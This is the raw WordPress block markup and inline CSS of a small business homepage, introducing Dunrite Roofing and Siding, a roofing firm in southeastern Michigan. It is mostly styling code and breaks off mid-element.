.skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-ec9b4f49-717b-424d-8c1f-2e6b2881e683 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\"} -->\n<style type=\"text/css\"> .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3b8ab6fb-01d5-431b-91dd-de5fc7c626d6\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":386,\"width\":257,\"height\":530,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image size-full is-resized is-style-default\"><img src=\"https://cteisys.com/wp-content/uploads/2022/08/32926267_2062360403778390_9097229843803668480_n.jpg\" alt=\"\" class=\"wp-image-386\" width=\"257\" height=\"530\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"2d0e433e-b09c-451a-a1f6-274a9de78652\",\"opacity\":100,\"backgroundColor\":\"#fe8333\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-quality-box\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-quality-box skt-blocks-block-section-outer-wrap block-2d0e433e-b09c-451a-a1f6-274a9de78652 background-type-color alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-2d0e433e-b09c-451a-a1f6-274a9de78652.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"88555fca-6dda-4435-9d42-f653c9586df1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-88555fca-6dda-4435-9d42-f653c9586df1 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-88555fca-6dda-4435-9d42-f653c9586df1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"cd3cb9ff-14b9-4cad-bfef-2367d403384a\"} -->\n<style type=\"text/css\"> .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cd3cb9ff-14b9-4cad-bfef-2367d403384a .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cd3cb9ff-14b9-4cad-bfef-2367d403384a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"0f159bdd-7f31-4f5d-8116-79161efa80a9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-0f159bdd-7f31-4f5d-8116-79161efa80a9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-0f159bdd-7f31-4f5d-8116-79161efa80a9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"426cabfe-a2cd-4360-aecf-17fd567995fe\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-426cabfe-a2cd-4360-aecf-17fd567995fe background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-426cabfe-a2cd-4360-aecf-17fd567995fe.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"6a199a30-74a8-487c-b888-156f1279eaf9\"} -->\n<style type=\"text/css\"> .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6a199a30-74a8-487c-b888-156f1279eaf9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"5a7066fe-d425-4153-8844-d8ae7a4116af\"} -->\n<style type=\"text/css\"> .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5a7066fe-d425-4153-8844-d8ae7a4116af\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"6836f24b-2686-4a49-bdc2-b859683a37cf\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" 